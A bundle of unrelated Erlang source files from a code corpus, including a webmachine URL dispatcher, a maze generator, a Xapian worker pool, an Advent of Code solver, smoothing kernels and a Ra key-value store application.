-define(SEPARATOR, $\/).
-define(MATCH_ALL, '*').
%% @spec dispatch(Path::string(), DispatchList::[matchterm()]) ->
%% dispterm() | dispfail()
%% @doc Interface for URL dispatching.
%% See also http://bitbucket.org/justin/webmachine/wiki/DispatchConfiguration
dispatch(PathAsString, DispatchList) ->
dispatch([], PathAsString, DispatchList).
%% @spec dispatch(Host::string(), Path::string(),
%% DispatchList::[matchterm()]) ->
%% dispterm() | dispfail()
%% @doc Interface for URL dispatching.
%% See also http://bitbucket.org/justin/webmachine/wiki/DispatchConfiguration
dispatch(HostAsString, PathAsString, DispatchList) ->
Path = string:tokens(PathAsString, [?SEPARATOR]),
% URIs that end with a trailing slash are implicitly one token
% "deeper" than we otherwise might think as we are "inside"
% a directory named by the last token.
ExtraDepth = case lists:last(PathAsString) == ?SEPARATOR of
true -> 1;
_ -> 0
end,
{Host, Port} = split_host_port(HostAsString),
try_host_binding(DispatchList, lists:reverse(Host), Port,
Path, ExtraDepth).
split_host_port(HostAsString) ->
case string:tokens(HostAsString, ":") of
[HostPart, PortPart] ->
{split_host(HostPart), list_to_integer(PortPart)};
[HostPart] ->
{split_host(HostPart), 80};
[] ->
%% no host header
{[], 80}
end.
split_host(HostAsString) ->
string:tokens(HostAsString, ".").
%% @type matchterm() = hostmatchterm() | pathmatchterm().
% The dispatch configuration is a list of these terms, and the
% first one whose host and path terms match the input is used.
% Using a pathmatchterm() here is equivalent to using a hostmatchterm()
% of the form {{['*'],'*'}, [pathmatchterm()]}.
%% @type hostmatchterm() = {hostmatch(), [pathmatchterm()]}.
% The dispatch configuration contains a list of these terms, and the
% first one whose host and one pathmatchterm match is used.
%% @type hostmatch() = [hostterm()] | {[hostterm()], portterm()}.
% A host header (Host, X-Forwarded-For, etc.) will be matched against
% this term. Using a raws [hostterm()] list is equivalent to using
% {[hostterm()], '*'}.
%% @type hostterm() = '*' | string() | atom().
% A list of hostterms is matched against a '.'-separated hostname.
% The '*' hosterm matches all remaining tokens, and is only allowed at
% the head of the list.
% A string hostterm will match a token of exactly the same string.
% Any atom hostterm other than '*' will match any token and will
% create a binding in the result if a complete match occurs.
%% @type portterm() = '*' | integer() | atom().
% A portterm is matched against the integer port after any ':' in
% the hostname, or 80 if no port is found.
% The '*' portterm patches any port
% An integer portterm will match a port of exactly the same integer.
% Any atom portterm other than '*' will match any port and will
% create a binding in the result if a complete match occurs.
%% @type pathmatchterm() = {[pathterm()], matchmod(), matchopts()}.
% The dispatch configuration contains a list of these terms, and the
% first one whose list of pathterms matches the input path is used.
%% @type pathterm() = '*' | string() | atom().
% A list of pathterms is matched against a '/'-separated input path.
% The '*' pathterm matches all remaining tokens.
% A string pathterm will match a token of exactly the same string.
% Any atom pathterm other than '*' will match any token and will
% create a binding in the result if a complete match occurs.
%% @type matchmod() = atom().
% This atom, if present in a successful matchterm, will appear in
% the resulting dispterm. In Webmachine this is used to name the
% controller module that will handle the matching request.
%% @type matchopts() = [term()].
% This term, if present in a successful matchterm, will appear in
% the resulting dispterm. In Webmachine this is used to provide
% arguments to the controller module handling the matching request.
%% @type dispterm() = {matchmod(), matchopts(), pathtokens(),
%% bindings(), approot(), stringpath()}.
%% @type pathtokens() = [pathtoken()].
% This is the list of tokens matched by a trailing '*' pathterm.
%% @type pathtoken() = string().
%% @type bindings() = [{bindingterm(),pathtoken()}].
% This is a proplist of bindings indicated by atom terms in the
% matching spec, bound to the matching tokens in the request path.
%% @type approot() = string().
%% @type stringpath() = string().
% This is the path portion matched by a trailing '*' pathterm.
%% @type dispfail() = {no_dispatch_match, pathtokens()}.
try_host_binding([], Host, Port, Path, _Depth) ->
{no_dispatch_match, {Host, Port}, Path};
try_host_binding([Dispatch|Rest], Host, Port, Path, Depth) ->
{{HostSpec,PortSpec},PathSpec} =
case Dispatch of
{{H,P},S} -> {{H,P},S};
{H,S} -> {{H,?MATCH_ALL},S};
S -> {{[?MATCH_ALL],?MATCH_ALL},[S]}
end,
case bind_port(PortSpec, Port, []) of
{ok, PortBindings} ->
case bind(lists:reverse(HostSpec), Host, PortBindings, 0) of
{ok, HostRemainder, HostBindings, _} ->
case try_path_binding(PathSpec, Path, HostBindings, Depth) of
{Mod, Props, PathRemainder, PathBindings,
AppRoot, StringPath} ->
{Mod, Props, HostRemainder, Port, PathRemainder,
PathBindings, AppRoot, StringPath};
{no_dispatch_match, _} ->
try_host_binding(Rest, Host, Port, Path, Depth)
end;
fail ->
try_host_binding(Rest, Host, Port, Path, Depth)
end;
fail ->
try_host_binding(Rest, Host, Port, Path, Depth)
end.
bind_port(Port, Port, Bindings) -> {ok, Bindings};
bind_port(?MATCH_ALL, _Port, Bindings) -> {ok, Bindings};
bind_port(PortAtom, Port, Bindings) when is_atom(PortAtom) ->
{ok, [{PortAtom, Port}|Bindings]};
bind_port(_, _, _) -> fail.
try_path_binding([], PathTokens, _, _) ->
{no_dispatch_match, PathTokens};
try_path_binding([{PathSchema, Mod, Props}|Rest], PathTokens,
Bindings, ExtraDepth) ->
case bind(PathSchema, PathTokens, Bindings, 0) of
{ok, Remainder, NewBindings, Depth} ->
{Mod, Props, Remainder, NewBindings,
calculate_app_root(Depth + ExtraDepth), reconstitute(Remainder)};
fail ->
try_path_binding(Rest, PathTokens, Bindings, ExtraDepth)
end.
bind([], [], Bindings, Depth) ->
{ok, [], Bindings, Depth};
bind([?MATCH_ALL], Rest, Bindings, Depth) when is_list(Rest) ->
{ok, Rest, Bindings, Depth + length(Rest)};
bind(_, [], _, _) ->
fail;
bind([Token|RestToken],[Match|RestMatch],Bindings,Depth) when is_atom(Token) ->
bind(RestToken, RestMatch, [{Token, Match}|Bindings], Depth + 1);
bind([Token|RestToken], [Token|RestMatch], Bindings, Depth) ->
bind(RestToken, RestMatch, Bindings, Depth + 1);
bind(_, _, _, _) ->
fail.
reconstitute([]) -> "";
reconstitute(UnmatchedTokens) -> string:join(UnmatchedTokens, [?SEPARATOR]).
calculate_app_root(1) -> ".";
calculate_app_root(N) when N > 1 ->
string:join(lists:duplicate(N, ".."), [?SEPARATOR]). | src/webmachine_dispatcher.erl | 0.512937 | 0.40439 | webmachine_dispatcher.erl | starcoder |
%%%-------------------------------------------------------------------
%%% @author grzeg
%%% @copyright (C) 2020, <COMPANY>
%%% @doc
%%%
%%% @end
%%% Created : 25. maj 2020 21:10
%%%-------------------------------------------------------------------
-module(maze_generator).
-author("grzeg").
%% API
-export([createMaze/2, step/1]).
-record(maze, {height, width, passages}).
%%%===================================================================
%%% API
%%%===================================================================
%%--------------------------------------------------------------------
%% @doc
%% Creates Empty maze with provided size
%%
%% @spec createMaze(Height, Width) -> {Maze, WallsNotInMaze}.
%% @end
%%--------------------------------------------------------------------
createMaze(Height, Width) ->
GenPassagePos = {rand:uniform(Width - 1), rand:uniform(Height - 1)},
Maze = #maze{height = Height, width = Width, passages = #{GenPassagePos => true}},
WallsNotInMaze = insertAdjacentPositionsIfValid(Maze#maze.height, Maze#maze.width, [], GenPassagePos),
{maze_not_finished_generating, {Maze, WallsNotInMaze}}.
%%--------------------------------------------------------------------
%% @doc
%% Does a Randomized Prim's algorithm step
%% described here: https://en.wikipedia.org/wiki/Maze_generation_algorithm#Randomized_Prim's_algorithm
%%
%% @spec step({maze_finished_or_not_atom, {Maze, WallsNotInMaze}}) -> {Maze, WallsNotInMaze}.
%% @end
%%--------------------------------------------------------------------
step({_maze_finished_or_not_atom, {Maze, []}}) ->
{finished_generation, {Maze, []}};
step({maze_not_finished_generating, {Maze, WallsNotInMaze}}) ->
GenPassagePos = lists:nth(rand:uniform(length(WallsNotInMaze)), WallsNotInMaze),
ReturnStruct = case returnPositionIfOneNeighbour(Maze#maze.passages, GenPassagePos) of
more_than_one_neighbouring_passage ->
{Maze, lists:delete(GenPassagePos, WallsNotInMaze)};
{badmap, Passages} ->
erlang:display("Passages should be map, got " + Passages),
{Maze, lists:delete(GenPassagePos, WallsNotInMaze)};
{NeighUniqPosX, NeighUniqPosY} ->
%% Calculate position that passage lead to %%
CellWhereNewPassageLeads = {
2 * element(1, GenPassagePos) - NeighUniqPosX,
2 * element(2, GenPassagePos) - NeighUniqPosY
},
ReturnMaze = Maze#maze{passages = maps:merge(
Maze#maze.passages,
#{GenPassagePos => true, CellWhereNewPassageLeads => true}
)},
WallsWithAdjacent = insertAdjacentPositionsIfValid(Maze#maze.height, Maze#maze.width, WallsNotInMaze, CellWhereNewPassageLeads),
{ReturnMaze, lists:delete(GenPassagePos, WallsWithAdjacent)}
end,
{maze_not_finished_generating, ReturnStruct }.
%%%===================================================================
%%% Internal functions
%%%===================================================================
%%--------------------------------------------------------------------
%% @private
%% @doc
%% Starts the server
%%
%% @spec mapIfPositionIsInMap(Passages, Position) -> Position |
%% false |
%% {badmap, Map}
%% @end
%%--------------------------------------------------------------------
mapIfPositionIsInMap(Passages, Position) ->
case maps:is_key(Position, Passages) of
true -> Position;
Res -> Res
end.
%%--------------------------------------------------------------------
%% @private
%% @doc
%% We check list of results provided from mapIfPositionIsInMap funtion and we check
%%
%% @spec returnPositionIfOne(ListOfResults, Position) -> more_than_one_neighbouring_passage |
%% {badmap, Passages} |
%% PositionTuple
%% @end
%%--------------------------------------------------------------------
returnPositionIfOne([{badmap, Passages} | _T], _) -> {badmap, Passages};
returnPositionIfOne([], Position) when is_tuple(Position) -> Position;
returnPositionIfOne([H | T], Position) when is_tuple(H) and is_tuple(Position) ->
more_than_one_neighbouring_passage;
returnPositionIfOne([H | T], position_not_found_yet) when is_tuple(H) ->
returnPositionIfOne(T, H);
returnPositionIfOne([_H | T], Passed) ->
returnPositionIfOne(T, Passed).
%%--------------------------------------------------------------------
%% @private
%% @doc
%% If position provided has one neighbour it return position of that neighbour, otherwise
%% informing atom
%%
%% @spec returnPositionIfOneNeighbour(Passages, Position) -> more_than_one_neighbouring_passage |
%% {badmap, Passages} |
%% PositionTuple
%% @end
%%--------------------------------------------------------------------
returnPositionIfOneNeighbour(Passages, Position) ->
ListOfResults = forEveryPosCallMapIfPosInMap(Passages, generateAdjacentPositions(Position)),
returnPositionIfOne(ListOfResults, position_not_found_yet).
%%--------------------------------------------------------------------
%% @private
%% @doc
%% Helper method that calls for every provided position calls mapIfPositionIsInMap
%% and accumulates result in list
%%
%% @spec forEveryPosCallMapIfPosInMap(Passages, Positions) -> ListOfResults
%% @end
%%--------------------------------------------------------------------
forEveryPosCallMapIfPosInMap(_Passages, []) -> [];
forEveryPosCallMapIfPosInMap(Passages, [PosH | PosT]) ->
[mapIfPositionIsInMap(Passages, PosH) | forEveryPosCallMapIfPosInMap(Passages, PosT)].
%%--------------------------------------------------------------------
%% @private
%% @doc
%% If position is within grid inserts it to provided list
%%
%% @spec ifValidInsert(Walls, Position, Height, Width) -> NewWalls
%% @end
%%--------------------------------------------------------------------
ifValidInsert(Walls, {X, Y}, Height, Width) when X >= 0, Y >= 0, X < Width, Y < Height ->
[{X, Y} | Walls];
ifValidInsert(Walls, {_X, _Y}, _Height, _Width) -> Walls.
%%--------------------------------------------------------------------
%% @private
%% @doc
%% For for adjacent positions to provided position calls validateAndInsert,
%% saves and returns result
%%
%% @spec insertAdjacentPositionsIfValid(Maze, WallsNotInMaze, PositionTuple) -> UpdatedWallsNotInMaze
%% @end
%%--------------------------------------------------------------------
insertAdjacentPositionsIfValid(Height, Width, WallsNotInMaze, Position) ->
forEveryPosCallCalAndIns(Height, Width, WallsNotInMaze, generateAdjacentPositions(Position)).
%%--------------------------------------------------------------------
%% @private
%% @doc
%% Helper method that calls for every provided position validateAndInsert function
%%
%% @spec forEveryPosCallCalAndIns(Height, Width, WallsNotInMaze, NeighbouringPositions) ->
%% UpdatedWallsNotInMaze
%% @end
%%--------------------------------------------------------------------
forEveryPosCallCalAndIns(_Height, _Width, WallsNotInMaze, []) ->
WallsNotInMaze;
forEveryPosCallCalAndIns(Height, Width, WallsNotInMaze, [NeighbouringH | NeighbouringT]) ->
NewNotInMaze = ifValidInsert(WallsNotInMaze, NeighbouringH, Height, Width),
forEveryPosCallCalAndIns(Height, Width, NewNotInMaze, NeighbouringT).
%%--------------------------------------------------------------------
%% @private
%% @doc
%% Generates list of positions adjacent to provided position
%%
%% @spec insertAdjacentPositionsIfValid(Maze, WallsNotInMaze, PositionTuple) -> UpdatedWallsNotInMaze
%% @end
%%--------------------------------------------------------------------
generateAdjacentPositions({X, Y}) ->
[
{X + 1, Y},
{X - 1, Y},
{X, Y + 1},
{X, Y - 1}
]. | maze_api/apps/maze_api/src/maze_generator.erl | 0.526099 | 0.501892 | maze_generator.erl | starcoder |
%% This module provides `start_link' function for Poolboy.
%% This module is used for grouping a set of __readers__.
-module(xapian_pool).
-define(SERVER, xapian_server).
-define(WORKER, ?MODULE).
-define(SUPERVISOR, xapian_pool_sup).
-ifdef(TEST).
-import(xapian_helper, [testdb_path/1]).
-include_lib("eunit/include/eunit.hrl").
-define(POOL, ?MODULE).
-record(test_pool, {names, pool_pids}).
-endif.
%% ------------------------------------------------------------------
%% Export
%% ------------------------------------------------------------------
%% API
-export([ open/3
, checkout/2
, close/1]).
%% Callbacks
-export([start_link/1]).
%% ------------------------------------------------------------------
%% Types
%% ------------------------------------------------------------------
-type pool_param() ::
{name, atom() | {local, atom()} | {global, atom()}}
| {worker_module, atom()}
| {size, non_neg_integer()}
| {max_overflow, non_neg_integer()}.
%% ------------------------------------------------------------------
%% API
%% ------------------------------------------------------------------
%% @doc Create a pool.
%% For `PoolParams' see https://github.com/devinus/poolboy
%%
%% <ul> <li>
%% `name': the pool name
%% </li><li>
%% `worker_module': the module that represents the workers
%% </li><li>
%% `size': maximum pool size
%% </li><li>
%% `max_overflow': maximum number of workers created if pool is empty
%% </li></ul>
%% @see xapian_server:open/3
-spec open([pool_param()], iolist(), [term()]) -> {ok, pid()} | {error, term}.
open(PoolParams, Path, Params) ->
Name = proplists:get_value(name, PoolParams),
FixedNameParam =
if
is_atom(Name), Name =/= undefined ->
[{name, {local, Name}}];
true ->
[]
end,
ExtPoolParams = FixedNameParam ++ PoolParams ++
[ {worker_module, ?WORKER}
, {worker_params, [Path, Params]}],
xapian_pool_sup:start_pool(ExtPoolParams).
%% @doc Destroy the pool asynchronously.
-spec close(atom() | pid()) -> term().
close(PoolName) ->
poolboy:stop(PoolName).
%% @doc Call the function `Fun' with the list of servers from pools,
%% regestered under the `PoolNames' names, as a parameter.
-spec checkout(PoolNames, Fun) -> Result when
PoolNames :: [atom() | pid()],
Fun :: fun((Servers) -> Result),
Servers :: [xapian_type:x_server()],
Result :: term().
checkout(PoolNames, Fun) ->
PoolWorkers =
[poolboy:checkout(PoolName) || PoolName <- PoolNames],
try
Fun(PoolWorkers)
after
lists:zipwith(fun(Name, Worker) ->
poolboy:checkin(Name, Worker)
end, PoolNames, PoolWorkers)
end.
%% @doc It is a callback for Poolboy.
start_link(Args) ->
[Path, Params] = proplists:get_value(worker_params, Args),
?SERVER:start_link(Path, Params).
%% ------------------------------------------------------------------
%% Tests
%% ------------------------------------------------------------------
-ifdef(TEST).
try_start_application() ->
case application:start(xapian) of
ok -> ok;
{error,{already_started,xapian}} ->
ok
end.
anonym_pool_test_() ->
try_start_application(),
%% The database path is "priv/Name".
Name = 'anonym_pool',
create_database(Name),
%% Create an anonymous pool
{ok, Pool} = ?POOL:open([], testdb_path(Name), []),
IsAlive = is_process_alive(Pool),
?POOL:close(Pool),
MonRef = erlang:monitor(process, Pool),
IsAliveAfterClose =
receive
%% Error in the transaction body.
{'DOWN', MonRef, process, Pool, _Reason} ->
false
after 500 ->
true
end,
[ ?_assert(IsAlive), ?_assertNot(IsAliveAfterClose) ].
pool_test_() ->
try_start_application(),
{foreach,
fun pool_setup/0,
fun pool_clean/1,
[ fun access_by_name_case/1
, fun access_by_pid_case/1
]}.
pool_setup() ->
Names = [pool1, pool2, pool3],
%% Create DBs
[create_database(Name) || Name <- Names],
%% Create pools of readers
Workers =
[begin
{ok, Pid} = ?POOL:open([{name, Name}], testdb_path(Name), []),
Pid
end || Name <- Names],
#test_pool{names=Names, pool_pids=Workers}.
pool_clean(#test_pool{names=Names}) ->
[ok = ?POOL:close(Name) || Name <- Names],
ok.
access_by_pid_case(#test_pool{pool_pids=Pools}) ->
Fun = fun([W1, W2, W3] = Workers) ->
lists:all(fun erlang:is_pid/1, Workers)
end,
Result = ?POOL:checkout(Pools, Fun),
[ ?_assertEqual(Result, true)
].
access_by_name_case(#test_pool{names=Pools}) ->
[].
create_database(Name) ->
Modes = [write, create, overwrite],
{ok, Server} = xapian_server:open(testdb_path(Name), Modes),
xapian_server:close(Server).
-endif. | src/xapian_pool.erl | 0.519521 | 0.443299 | xapian_pool.erl | starcoder |
-module(problem2017_09).
-export([solve1/1, solve2/1]).
-type counter() :: non_neg_integer().
-type parser_state() :: bang | garbage | { group, counter() }.
-type state() :: { [ parser_state() ], counter(), counter() }.
-spec process( char(), state() ) -> state().
process( _, { [ bang | States ], S, G } ) ->
{ States, S, G };
process( $!, { States, S, G } ) ->
{ [ bang | States ], S, G };
process( $>, { [ garbage | States ], S, G } ) ->
{ States, S, G };
process( _, { [ garbage | _ ] = States, S, G } ) ->
{ States, S, G + 1 };
process( $<, { States, S, G } ) ->
{ [ garbage | States ], S, G };
process( ${, { [ { group, N } | _ ] = States, S, G } ) ->
{ [ { group, N + 1 } | States ], S, G };
process( $}, { [ { group, N } | States ], S, G } ) ->
{ States, S + N, G };
process( $,, States ) ->
States.
-spec solve( string() ) -> state().
solve( Input ) ->
lists:foldl( fun process/2, { [ { group, 0 } ], 0, 0 }, Input ).
-spec solve1( string() ) -> counter().
solve1( Input ) ->
{ _, Score, _ } = solve( Input ),
Score.
-spec solve2( string() ) -> counter().
solve2( Input ) ->
{ _, _, Garbage } = solve( Input ),
Garbage.
-include_lib("eunit/include/eunit.hrl").
solve1_test_() ->
[
?_assertEqual( 1, solve1( "{}" ) ),
?_assertEqual( 6, solve1( "{{{}}}" ) ),
?_assertEqual( 5, solve1( "{{},{}}" ) ),
?_assertEqual( 16, solve1( "{{{},{},{{}}}}" ) ),
?_assertEqual( 1, solve1( "{<a>,<a>,<a>,<a>}" ) ),
?_assertEqual( 9, solve1( "{{<ab>},{<ab>},{<ab>},{<ab>}}" ) ),
?_assertEqual( 9, solve1( "{{<!!>},{<!!>},{<!!>},{<!!>}}" ) ),
?_assertEqual( 3, solve1( "{{<a!>},{<a!>},{<a!>},{<ab>}}" ) )
].
solve2_test_() ->
[
?_assertEqual( 0, solve2( "<>" ) ),
?_assertEqual( 17, solve2( "<random characters>" ) ),
?_assertEqual( 3, solve2( "<<<<>" ) ),
?_assertEqual( 2, solve2( "<{!>}>" ) ),
?_assertEqual( 0, solve2( "<!!>" ) ),
?_assertEqual( 0, solve2( "<!!!>>" ) ),
?_assertEqual( 10, solve2( "<{o\"i!a,<{i<a>" ) )
]. | src/2017/problem2017_09.erl | 0.52829 | 0.612802 | problem2017_09.erl | starcoder |
%%%===================================================================
%%% @copyright 2019 Klarna Bank AB (publ)
%%%
%%% @doc This module implements a stateful stream processing node for
%%% many-into-one transformations.
%%%
%%% One has to create a callback module with `kflow_gen_aggregate'
%%% behavior.
%%%
%%% `init' and `terminate' callbacks are similar to those in {@link
%%% kflow_gen_map} or {@link kflow_gen_filter} behaviors.
%%%
%%% == Consuming upstream messages ==
%%%
%%% `in' callback is invoked for each incoming message from the
%%% upstream. It takes 4 arguments:
%%%
%%% <ol><li>Offset of a message</li>
%%%
%%% <li>Message itself</li>
%%%
%%% <li>State of the callback module. This state is created in `init'
%%% callback and can be mutated in the callbacks.</li>
%%%
%%% <li>Last argument is initial configuration of the aggregator
%%% (constant)</li></ol>
%%%
%%% Return value should be a tuple `{Flush, NextState}' where `Flush'
%%% can be atoms `keep', `flush' or `reject'.
%%%
%%% `keep' means that the aggregator should keep collecting upstream
%%% messages without producing anything downstream.
%%%
%%% `flush' means that the aggregator is ready to produce a message
%%% downstream.
%%%
%%% `reject' means the last upstream message was incompatible with the
%%% data that had been aggregated so far. (E.g. schema of the data was
%%% different). In this case <i>previous</i> state is flushed and the
%%% last message is replayed from blank state.
%%%
%%% == Producing messages downstream ==
%%%
%%% `out' callback is used to produce a message downstream. It is
%%% invoked when `in' callback returns `flush' or `reject', or when
%%% flush is implicitly requested by low-level control logic. It takes
%%% two arguments: first one is current state of the callback module
%%% and the second one is initial configuration.
%%%
%%% It should output a tuple `{ok | exit, DownstreamMessage, NextState}'
%%% or an atom `keep'.
%%%
%%% Returning `{ok, Msg, NextState}' will result in sending `Msg'
%%% downstream, and waiting for new messages with state `NextState'.
%%%
%%% Returning `{exit, Msg, NextState}' will result in sending `Msg'
%%% downstream, calling `terminate' callback, if it is defined by the
%%% user CBM, and then forgetting about the state of the user CBM for
%%% the route. This is useful when the number of routes is unlimited.
%%%
%%% If user CBM returns `keep', then gen_aggregate will keep the state
%%% and won't produce anything downstream. This is useful to avoid
%%% situation when `flush' is requested by some external logic, but
%%% user CBM doesn't want to to flush half-finished data.
%%%
%%% == Example ==
%%% ```
%%% -module(my_aggregate).
%%%
%%% -behavior(kflow_gen_aggregate).
%%%
%%% -export([init/1, in/4, out/2, terminate/1]).
%%%
%%% init(_Config) ->
%%% [].
%%%
%%% in(Offset, Message, State, Config) ->
%%% N = maps:get(buffer_size, Config),
%%% Flush = if length(State) >= N ->
%%% flush;
%%% true ->
%%% keep
%%% end,
%%% {Flush, [Message|State]}.
%%%
%%% out(State, _Config) ->
%%% Output = lists:reverse(State),
%%% NewState = [],
%%% {ok, Output, NewState}.
%%%
%%% terminate(_State) ->
%%% ok.
%%%
%%% '''
%%% @end
%%%===================================================================
-module(kflow_gen_aggregate).
-behavior(kflow_gen).
-include("kflow_int.hrl").
-export([init/2, handle_message/3, handle_flush/2, terminate/2]).
-type flush() :: keep % Keep accumulating the messages
| flush % Flush the accumulated messages
| reject. % Flush the messages accumulated before the last
% one and replay it with an empty buffer
-callback init(_Config) -> _State.
-callback in(kflow:offset(), _Msg, State, _Config) -> {flush(), State}.
-callback out(State, _Config) -> {ok | exit, _Msg, State}
| keep
.
-callback terminate(_State, _Config) -> _.
-optional_callbacks([init/1, terminate/2]).
%% @private
init(NodeId, Config) ->
kflow_multistate:wrap(NodeId, kflow_gen_aggregate_impl, Config).
%% @private
handle_message(Msg, State, Config) ->
kflow_multistate:handle_message(Msg, State, Config).
%% @private
handle_flush(State, Config) ->
kflow_multistate:handle_flush(State, Config).
%% @private
terminate(State, Config) ->
kflow_multistate:terminate(State, Config). | src/framework/kflow_gen_aggregate.erl | 0.547222 | 0.562717 | kflow_gen_aggregate.erl | starcoder |
% ==============================================================================
% Smoothing Kernels
% ==============================================================================
-module(kernels).
-export([boxcar/1, gaussian/1, epanechnikov/1, tricube/1, triangular/1]).
-define(SQR(X), ((X)*(X))).
-define(CUBE(X), ((X)*(X)*(X))).
-ifdef(TEST).
-include_lib("eunit/include/eunit.hrl").
-define(assertEqualDigits(X,Y,D), ?assert(abs((X)-(Y)) < math:pow(10,-(D)))).
-endif.
% ------------------------------------------------------------------------------
% Indicator function
% ------------------------------------------------------------------------------
i(X) when abs(X) =< 1 -> 1.0;
i(_) -> 0.0.
% ------------------------------------------------------------------------------
% Boxcar Kernel
% ------------------------------------------------------------------------------
boxcar(X) ->
0.5*i(X).
% ------------------------------------------------------------------------------
% Gaussian Kernel
% ------------------------------------------------------------------------------
gaussian(X) ->
0.398942280401432678*math:exp(-0.5*?SQR(X)).
% ------------------------------------------------------------------------------
% Epanechnikov Kernel
% ------------------------------------------------------------------------------
epanechnikov(X) ->
0.75*(1-?SQR(X))*i(X).
% ------------------------------------------------------------------------------
% Tricube Kernel
% ------------------------------------------------------------------------------
tricube(X) ->
0.8641975308641975*?CUBE(1-?CUBE(abs(X)))*i(X).
% ------------------------------------------------------------------------------
% Triangular Kernel
% ------------------------------------------------------------------------------
triangular(X) ->
(1-abs(X))*i(X).
% ------------------------------------------------------------------------------
% Cosine Kernel
% ------------------------------------------------------------------------------
cosine(X) ->
0.7853981633974483*math:cos(1.570796326794897*X)*i(X).
% ==============================================================================
% EUnit tests
% ------------------------------------------------------------------------------
-ifdef(TEST).
indicator_test() ->
?assertEqual(1.0, i(1.0)),
?assertEqual(1.0, i(0.0)),
?assertEqual(1.0, i(0.5)),
?assertEqual(1.0, i(-0.5)),
?assertEqual(0.0, i(10.0)).
boxcar_test() ->
?assertEqual(0.5, boxcar(1.0)),
?assertEqual(0.5, boxcar(0.0)),
?assertEqual(0.5, boxcar(0.5)),
?assertEqual(0.5, boxcar(-0.5)),
?assertEqual(0.0, boxcar(10.0)),
?assertEqual(0.0, boxcar(-1.01)).
gaussian_test() ->
?assertEqual(0.24197072451914337, gaussian(1.0)),
?assertEqual(0.3989422804014327, gaussian(0.0)),
?assertEqual(0.3520653267642995, gaussian(0.5)),
?assertEqual(0.3520653267642995, gaussian(-0.5)),
?assertEqual(7.69459862670642e-23, gaussian(10.0)),
?assertEqual(0.23955109772801336, gaussian(-1.01)).
epanechnikov_test() ->
?assertEqual(0.0, epanechnikov(1.0)),
?assertEqual(0.75, epanechnikov(0.0)),
?assertEqual(0.5625, epanechnikov(0.5)),
?assertEqual(0.5625, epanechnikov(-0.5)),
?assertEqual(0.0, epanechnikov(10.0)),
?assertEqual(0.0, epanechnikov(-1.01)).
tricube_test() ->
?assertEqual(0.0, tricube(1.0)),
?assertEqual(70/81, tricube(0.0)),
?assertEqual(0.5789448302469136, tricube(0.5)),
?assertEqual(0.5789448302469136, tricube(-0.5)),
?assertEqual(0.0, tricube(10.0)),
?assertEqual(0.0, tricube(-1.01)).
triangular_test() ->
?assertEqual(0.0, triangular(1.0)),
?assertEqual(1.0, triangular(0.0)),
?assertEqual(0.5, triangular(0.5)),
?assertEqual(0.5, triangular(-0.5)),
?assertEqual(0.0, triangular(10.0)),
?assertEqual(0.0, triangular(-1.01)).
cosine_test() ->
?assertEqualDigits(0.0, cosine(1.0), 14),
?assertEqual(0.7853981633974483, cosine(0.0)),
?assertEqual(0.5553603672697957, cosine(0.5)),
?assertEqual(0.5553603672697957, cosine(-0.5)),
?assertEqual(0.0, cosine(10.0)),
?assertEqual(0.0, cosine(-1.01)).
-endif. | src/kernels.erl | 0.512937 | 0.663982 | kernels.erl | starcoder |
%% Copyright (c) 2018 Pivotal Software Inc, All Rights Reserved.
%%
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
%%
-module(ra_kv_store_app).
-behaviour(application).
-export([start/2, connect_nodes/1, connect_node/1]).
-export([stop/1]).
wait_for_nodes([]) ->
error_logger:info_msg("All erlang nodes connected~n", []),
ok;
wait_for_nodes([Node | Rem] = AllNodes) ->
case net_kernel:connect_node(Node) of
true ->
%% we're connected, great
wait_for_nodes(Rem);
false ->
error_logger:info_msg("Could not connect ~w. Sleeping...~n", [Node]),
%% we could not connect, sleep a bit and recurse
timer:sleep(1000),
wait_for_nodes(AllNodes)
end.
start(_Type, _Args) ->
{ok, Servers} = application:get_env(ra_kv_store, nodes),
Nodes = [N || {_, N} <- Servers],
{ok, ServerReference} = application:get_env(ra_kv_store, server_reference),
logger:set_primary_config(level, all),
ClusterId = <<"ra_kv_store">>,
Config = #{},
Machine = {module, ra_kv_store, Config},
ok = ra:start(),
case application:get_env(ra_kv_store, restart_ra_cluster) of
{ok, true} ->
Node = {ServerReference, node()},
error_logger:info_msg("Restarting RA node ~p~n", [Node]),
ok = ra:restart_server(Node);
{ok, false} ->
[N | _] = lists:usort(Nodes),
case N == node() of
true ->
%% wait for all nodes to come online
ok = wait_for_nodes(Nodes),
%% only the smallest node declares a cluster
timer:sleep(2000),
{ok, Started, Failed} = ra:start_cluster(ClusterId, Machine, Servers),
case length(Started) == length(Servers) of
true ->
%% all started
ok;
false ->
error_logger:info_msg("RA cluster failures ~w",
[Failed]),
ok
end;
false ->
ok
end,
ok
end,
% to make sure nodes are always connected
{ok, ReconnectInterval} = application:get_env(ra_kv_store, node_reconnection_interval),
{ok, _ } = timer:apply_interval(
ReconnectInterval,
?MODULE, connect_nodes, [Servers]),
Dispatch = cowboy_router:compile([
{'_', [{"/:key", ra_kv_store_handler, [{server_reference, ServerReference}]}]}
]),
{ok, Port} = application:get_env(ra_kv_store, port),
{ok, _} = cowboy:start_clear(kv_store_http_listener,
[{port, Port}],
#{env => #{dispatch => Dispatch}}
),
ra_kv_store_sup:start_link().
stop(_State) ->
ok.
connect_nodes(Nodes) ->
error_logger:info_msg("Reconnecting nodes ~p~n", [Nodes]),
lists:foreach(fun ra_kv_store_app:connect_node/1, Nodes).
connect_node({_, Node}) ->
net_kernel:connect_node(Node). | src/ra_kv_store_app.erl | 0.599251 | 0.410372 | ra_kv_store_app.erl | starcoder |
%%
%% Copyright (c) 2015-2016 <NAME>. All Rights Reserved.
%% Copyright (c) 2007-2012 Basho Technologies, Inc. All Rights Reserved.
%%
%% This file is provided to you under the Apache License,
%% Version 2.0 (the "License"); you may not use this file
%% except in compliance with the License. You may obtain
%% a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing,
%% software distributed under the License is distributed on an
%% "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
%% KIND, either express or implied. See the License for the
%% specific language governing permissions and limitations
%% under the License.
%%
%% -------------------------------------------------------------------
%% @doc GSet CRDT: grow only set.
%%
%% @reference <NAME>, <NAME>, and <NAME>
